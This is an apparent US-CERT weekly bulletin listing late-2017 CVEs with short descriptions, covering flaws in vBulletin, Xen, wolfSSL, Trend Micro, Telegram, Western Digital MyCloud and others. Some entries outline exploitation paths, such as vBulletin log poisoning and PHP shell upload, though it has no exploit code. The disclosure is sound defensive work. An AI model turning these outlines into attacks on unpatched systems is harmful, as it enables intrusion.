techno -- portfolio_management_panel
 
Techno - Portfolio Management Panel through 2017-11-16 allows XSS via the panel/search.php s parameter.2017-12-15not yet calculatedCVE-2017-17694
MISC
techno -- portfolio_management_panel
 
Techno - Portfolio Management Panel through 2017-11-16 does not check authorization for panel/portfolio.php?action=delete requests that remove feedback.2017-12-15not yet calculatedCVE-2017-17693
MISC
telegram – telegram_messenger
 
The saveFile method in MediaController.java in the Telegram Messenger application before 2017-12-08 for Android allows directory traversal via a pathname obtained in a file-transfer request from a remote peer, as demonstrated by writing to tgnet.dat or tgnet.dat.bak.2017-12-16not yet calculatedCVE-2017-17715
MISC
tex_live -- tex_live
 
TeX Live through 20170524 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL, related to linked_scripts/context/stubs/unix/mtxrun, texmf-dist/scripts/context/stubs/mswin/mtxrun.lua, and texmf-dist/tex/luatex/lualibs/lualibs-os.lua.2017-12-14not yet calculatedCVE-2017-17513
MISC
tibbr -- tibbr_community_and_tibbr_enterprise
 
The tibbr web server components of tibbr Community, and tibbr Enterprise contain SAML protocol handling errors which may allow authorized users to impersonate other users, and therefore escalate their access privileges. Affected releases are tibbr Community 5.2.1 and below; 6.0.0; 6.0.1; 7.0.0, tibbr Enterprise 5.2.1 and below; 6.0.0; 6.0.1; 7.0.0.2017-12-12not yet calculatedCVE-2017-5530
CONFIRM
tibbr -- tibbr_community_and_tibbr_enterprise
 
The tibbr user profiles components of tibbr Community, and tibbr Enterprise expose a weakness in an improperly sandboxed third-party component. Affected releases are TIBCO Software Inc. tibbr Community 5.2.1 and below; 6.0.0; 6.0.1; 7.0.0, tibbr Enterprise 5.2.1 and below; 6.0.0; 6.0.1; 7.0.0.2017-12-12not yet calculatedCVE-2017-5534
CONFIRM
tibco -- businessworks_process_monitor
 
Cross-site scripting (XSS) vulnerability in Integration Matters nJAMS 3, as used in TIBCO BusinessWorks Process Monitor through 3.0.1.3 and other products, allows remote authenticated administrators to inject arbitrary web script or HTML via the users management panel of the web interface.2017-12-10not yet calculatedCVE-2017-16789
MISC
tidy -- tidy
 
In Tidy 5.7.0, the prvTidyTidyMetaCharset function in clean.c allows attackers to cause a denial of service (Segmentation Fault), because the currentNode variable in the "children of the head" processing feature is modified in the loop without validating the new value.2017-12-10not yet calculatedCVE-2017-17497
CONFIRM
tin -- tin
 
** DISPUTED ** tools/url_handler.pl in TIN 2.4.1 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. NOTE: a third party has reported that this is intentional behavior, because the documentation states "url_handler.pl was designed to work together with tin which only issues shell escaped absolute URLs."2017-12-14not yet calculatedCVE-2017-17520
MISC
tkabber -- tkabber
 
default.tcl in Tkabber 1.1 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17533
MISC
trend_micro -- encryption_for_mail
 
A service DLL preloading vulnerability in Trend Micro Encryption for Email versions 5.6 and below could allow an unauthenticated remote attacker to execute arbitrary code on a vulnerable system.2017-12-15not yet calculatedCVE-2017-11397
MISC
CONFIRM
trend_micro -- scanmail_for_exchange
 
The Log Query and Quarantine Query pages in Trend Micro ScanMail for Exchange 12.0 are vulnerable to cross site scripting (XSS) attacks.2017-12-15not yet calculatedCVE-2017-14093
CONFIRM
MISC
trend_micro -- scanmail_for_exchange
 
The absence of Anti-CSRF tokens in Trend Micro ScanMail for Exchange 12.0 web interface forms could allow an attacker to submit authenticated requests when an authenticated user browses an attacker-controlled domain.2017-12-15not yet calculatedCVE-2017-14092
CONFIRM
MISC
trend_micro -- scanmail_for_exchange
 
A vulnerability in Trend Micro ScanMail for Exchange 12.0 exists in which some communications to the update servers are not encrypted.2017-12-15not yet calculatedCVE-2017-14090
CONFIRM
MISC
trend_micro -- scanmail_for_exchange
 
A vulnerability in Trend Micro ScanMail for Exchange 12.0 exists in which certain specific installations that utilize a uncommon feature - Other Update Sources - could be exploited to overwrite sensitive files in the ScanMail for Exchange directory.2017-12-15not yet calculatedCVE-2017-14091
CONFIRM
MISC
vbulletin -- vbulletin
 
vBulletin through 5.3.x on Windows allows remote PHP code execution because a require_once call is reachable with an unauthenticated request that can include directory traversal sequences to specify an arbitrary pathname, and because ../ traversal is blocked but ..\ traversal is not blocked. For example, an attacker can make an invalid HTTP request containing PHP code, and then make an index.php?routestring= request with enough instances of ".." to reach an Apache HTTP Server log file.2017-12-13not yet calculatedCVE-2017-17671
MISC
vbulletin -- vbulletin
 
In vBulletin through 5.3.x, there is an unauthenticated deserialization vulnerability that leads to arbitrary file deletion and, under certain circumstances, code execution, because of unsafe usage of PHP's unserialize() in vB_Library_Template's cacheTemplates() function, which is a publicly exposed API. This is exploited with the templateidlist parameter to ajax/api/template/cacheTemplates.2017-12-13not yet calculatedCVE-2017-17672
MISC
videolan -- vlc_media_player
 
In VideoLAN VLC media player through 2.2.8, there is a type conversion vulnerability in modules/demux/mp4/libmp4.c in the MP4 demux module leading to a invalid free, because the type of a box may be changed between a read operation and a free operation.2017-12-15not yet calculatedCVE-2017-17670
MISC
vmware -- airwatch_console
 
VMware AirWatch Console (AWC) contains a Broken Access Control vulnerability. Successful exploitation of this issue could result in end-user device details being disclosed to an unauthorized administrator.2017-12-12not yet calculatedCVE-2017-4942
BID
SECTRACK
CONFIRM
vmware -- vasa_provider
 
Versions of VASA Provider for Clustered Data ONTAP prior to 7.0P1 contain a web server that accepts plain text authentication. This could allow an unauthenticated attacker to obtain authentication credentials.2017-12-11not yet calculatedCVE-2016-6904
CONFIRM
western_digital -- mycloud_pr4100_2.30.172_devices
 
An issue was discovered on Western Digital MyCloud PR4100 2.30.172 devices. The web administration component, /web/jquery/uploader/multi_uploadify.php, provides multipart upload functionality that is accessible without authentication and can be used to place a file anywhere on the device's file system. This allows an attacker the ability to upload a PHP shell onto the device and obtain arbitrary code execution as root.2017-12-12not yet calculatedCVE-2017-17560
MISC
MISC
white_dune -- white_dune
 
swt/motif/browser.c in White_dune (aka whitedune) 0.30.10 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17518
MISC
wolfssl -- wolfssl
 
wolfSSL prior to version 3.12.2 provides a weak Bleichenbacher oracle when any TLS cipher suite using RSA key exchange is negotiated. An attacker can recover the private key from a vulnerable wolfSSL application. This vulnerability is referred to as "ROBOT."2017-12-12not yet calculatedCVE-2017-13099
CERT-VN
BID
CONFIRM
MISC
xen -- xen
 
An issue was discovered in Xen through 4.9.x allowing guest OS users to cause a denial of service (host OS crash) or gain host OS privileges by leveraging an incorrect mask for reference-count overflow checking in shadow mode.2017-12-12not yet calculatedCVE-2017-17563
CONFIRM
CONFIRM
xen -- xen
 
An issue was discovered in Xen through 4.9.x allowing PV guest OS users to cause a denial of service (host OS crash) if shadow mode and log-dirty mode are in place, because of an incorrect assertion related to M2P.2017-12-12not yet calculatedCVE-2017-17565
CONFIRM
CONFIRM
xen -- xen
 
An issue was discovered in Xen through 4.9.x allowing PV guest OS users to cause a denial of service (host OS crash) or gain host OS privileges in shadow mode by mapping a certain auxiliary page.2017-12-12not yet calculatedCVE-2017-17566
CONFIRM
CONFIRM

xen -- xen
 
An issue was discovered in Xen through 4.9.x allowing guest OS users to cause a denial of service (host OS crash) or gain host OS privileges by leveraging incorrect error handling for reference counting in shadow mode.2017-12-12not yet calculatedCVE-2017-17564
CONFIRM
CONFIRM
xtuple_postbooks -- xtuple_postbooks
 
guiclient/guiclient.cpp in xTuple PostBooks 4.7.0 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17525
MISC
yourphpscript.com -- simple_chatting_system
 
Simple Chatting System 1.0 allows Arbitrary File Upload via view/my_profile.php, which places files under uploads/.2017-12-13not yet calculatedCVE-2017-17593
MISC
zoho -- manageengine_password_manager_pro_9
 
Zoho ManageEngine Password Manager Pro 9 before 9.4 (9400) has reflected XSS in SearchResult.ec and BulkAccessControlView.ec.2017-12-15not yet calculatedCVE-2017-17698
CONFIRM
Back to top

This product is provided subject to this Notification and this Privacy & Use policy.




from US-CERT National Cyber Alert System http://ift.tt/2Bt5FXz